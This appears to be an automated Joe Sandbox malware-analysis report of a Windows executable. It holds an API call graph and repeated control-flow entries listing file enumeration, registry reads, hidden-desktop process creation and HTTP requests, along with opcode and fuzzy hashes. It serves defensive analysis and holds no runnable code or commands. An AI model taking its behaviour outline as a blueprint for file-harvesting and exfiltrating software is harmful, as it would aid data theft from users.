11119 43d0a2 11120 43d0c2 FindNextFileA 11119->11120 10977 43dce0 10978 43dcf7 10977->10978 10981 43b982 10978->10981 10982 43b9af 10981->10982 10987 43b345 10982->10987 10983 43ba7a 10986 43b345 wsprintfA FindFirstFileA 10983->10986 10984 43bae1 10986->10984 10988 43b388 wsprintfA FindFirstFileA 10987->10988 11122 4021a4 11123 4021d1 RegOpenKeyExA 11122->11123 10989 431366 10990 431398 RegQueryValueExA 10989->10990 10991 4313ba 10990->10991 10992 43d4eb 10993 43d508 CreateDirectoryA 10992->10993 10995 43d5e4 10993->10995 11004 43c797 10995->11004 11008 43c684 10995->11008 10996 43d5f5 InternetOpenA 10998 43d686 InternetOpenA 10996->10998 10999 43d6bb 10998->10999 11001 415694 InternetReadFile 10999->11001 11000 43d703 11001->11000 11005 43c7a5 11004->11005 11012 43c086 11005->11012 11009 43c6a4 11008->11009 11017 43c1c2 11009->11017 11013 43c0b2 11012->11013 11016 418024 InternetReadFile 11013->11016 11018 43c1f0 11017->11018 11026 417f58 11018->11026 11029 417ec8 11018->11029 11032 417d09 11018->11032 11036 417e16 InternetConnectA 11018->11036 11037 418024 InternetReadFile 11018->11037 11038 417e7d 11018->11038 11027 417f73 HttpSendRequestA 11026->11027 11028 417fa9 11027->11028 11030 417ecf HttpOpenRequestA 11029->11030 11033 417d40 InternetOpenA 11032->11033 11035 417dc4 11033->11035 11039 417ecf HttpOpenRequestA 11038->11039 11041 43356a 11042 433584 RtlAllocateHeap 11041->11042 11043 414de8 11044 414e0f InternetCrackUrlA 11043->11044 11046 414ec1 11044->11046 11047 43106f GetCurrentHwProfileA 11048 4016ef lstrcmpiW 11125 41b02e 11126 41b06e getaddrinfo 11125->11126 11127 41b1ae 11128 41b1c9 send 11127->11128 11049 43d970 11050 43d9a7 11049->11050 11055 41770f InternetReadFile 11050->11055 11051 43d9da 11054 403af4 FindFirstFileA FindFirstFileA 11051->11054 11052 43da38 11054->11052 11130 43dc30 11131 43dc4d 11130->11131 11137 43a467 memset RegOpenKeyExA 11131->11137 11138 43a4ce 11131->11138 11139 43a4ef 11138->11139 11147 43a0ae 11139->11147 11140 43a586 11143 43a0ae FindFirstFileA 11140->11143 11141 43a5ca 11144 43a0ae FindFirstFileA 11141->11144 11142 43a60e 11146 4346be CreateToolhelp32Snapshot Process32First 11142->11146 11143->11141 11144->11142 11148 43a0f7 FindFirstFileA 11147->11148 11150 43e5b7 11151 43e5d8 ShellExecuteEx memset 11150->11151 11153 43e74a ExitProcess 11151->11153 11154 43e767 11153->11154 11156 434abb TerminateProcess 11157 434ad5 11156->11157 11157->11157 11056 41a8fa 11057 41a8ac InternetReadFile 11056->11057 11057->11056 11158 44163a 11159 44165c LoadLibraryA 11158->11159 11161 442112 LoadLibraryA LoadLibraryA 11159->11161 11162 44217b LoadLibraryA LoadLibraryA 11161->11162 11164 442220 LoadLibraryA 11162->11164

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 569 41cb56-41cd00 CreateDesktopA memset * 2 CreateProcessA
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Creatememset$DesktopProcess
                                                                                                                                                                        • String ID: OCALAPPDATA
                                                                                                                                                                        • API String ID: 2911880311-2158123194
                                                                                                                                                                        • Opcode ID: df3894671ed378ae8f98c75e437b6fcbf7c2463c26c69d7b82021d695b4e2206
                                                                                                                                                                        • Instruction ID: ecc39fbefac0841ba03244daffe3c5161f46bbd8383f0468050ffefe366c0534
                                                                                                                                                                        • Opcode Fuzzy Hash: df3894671ed378ae8f98c75e437b6fcbf7c2463c26c69d7b82021d695b4e2206
                                                                                                                                                                        • Instruction Fuzzy Hash: BA5192B2E046009BD704CF68DD84AE9B7F5EFD9304F09456DE949E3321F7B0AA848B95

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 602 4390c5-439181 call 44b1f0 FindFirstFileA memset * 2
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$FileFindFirst
                                                                                                                                                                        • String ID: %s\*.*
                                                                                                                                                                        • API String ID: 2180624105-1013718255
                                                                                                                                                                        • Opcode ID: 07370fb780c961ecf0af3d7c7082cdf046c94904b0a511b25c6c9beed1cfa149
                                                                                                                                                                        • Instruction ID: 7d42249a407310c214c8f46e26e7ec32ae29d16c073ba9705e9601784c8f0509
                                                                                                                                                                        • Opcode Fuzzy Hash: 07370fb780c961ecf0af3d7c7082cdf046c94904b0a511b25c6c9beed1cfa149
                                                                                                                                                                        • Instruction Fuzzy Hash: FF11BFB1B00218ABD714DF69EC95D9A37BDEB88354F040668FA05D7341FAB4AE40CBB5
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirstwsprintf
                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                        • API String ID: 2655791690-766152087
                                                                                                                                                                        • Opcode ID: 2bc079377df668d970cf8aa9dda274538490f369c3b74130dc3a6c3863138d9a
                                                                                                                                                                        • Instruction ID: e7666cf382891cf504827687b6435c28648605b03577316b9fbddf840bdd4e2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 2bc079377df668d970cf8aa9dda274538490f369c3b74130dc3a6c3863138d9a
                                                                                                                                                                        • Instruction Fuzzy Hash: 50012F35A102089FC324CF18EC89C6633ADFF89318B080269E808D7350EAB2AD85CBD1
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00402BE1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 1974802433-1173974218
                                                                                                                                                                        • Opcode ID: e496c4a87c61f27c7071ab950c09f988eb55113fc90724f612245b9791ec29b1
                                                                                                                                                                        • Instruction ID: cdf80ab18b432466ce706905b861d013941f1127455d591d47261a58a33e80eb
                                                                                                                                                                        • Opcode Fuzzy Hash: e496c4a87c61f27c7071ab950c09f988eb55113fc90724f612245b9791ec29b1
                                                                                                                                                                        • Instruction Fuzzy Hash: F4413476A102098FCB55CB58DCD4DEA73B5BFD821970904A5E52AE7362EA34EE00CF44
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0041E42B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 1974802433-4000257214
                                                                                                                                                                        • Opcode ID: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
                                                                                                                                                                        • Instruction ID: 444d2139b4423df7e404c14bc0898a50738c756d6f3279185a54cc7c24eee840
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A2162B67001549FC704DF6CDDE0EA933B9EBC9604B084168E915E3362E6B4AE14CB59
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00421FC9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 1974802433-1173974218
                                                                                                                                                                        • Opcode ID: f26b492d590c6f12eefa27f5d3f89ee5ac1bd54bc0b47279981acb4c9aab51aa
                                                                                                                                                                        • Instruction ID: d1189efa58fda6785e8e3e902c189e96ec68bb8dd3af9d925bade52238774e6f
                                                                                                                                                                        • Opcode Fuzzy Hash: f26b492d590c6f12eefa27f5d3f89ee5ac1bd54bc0b47279981acb4c9aab51aa
                                                                                                                                                                        • Instruction Fuzzy Hash: E9215E727002149FC714DF68ED95EA973F9EFC8748B080168E815D7361EAB0AE14CB6A
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0043A11C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                        • API String ID: 1974802433-4073750446
                                                                                                                                                                        • Opcode ID: 11f224972baa5b82e91e0726b854a2c5cade10394e326f9ed94f55559d034421
                                                                                                                                                                        • Instruction ID: a5bbe4c3e1cc24758aca5ebfd760b2f682ad06a0850f42dd23323b564b68bf0f
                                                                                                                                                                        • Opcode Fuzzy Hash: 11f224972baa5b82e91e0726b854a2c5cade10394e326f9ed94f55559d034421
                                                                                                                                                                        • Instruction Fuzzy Hash: 6511AD706101059FDB18DB18DC85DAA73BAEF89354B10426CE805E7392EB74AD42CBAA
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0043CE9A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
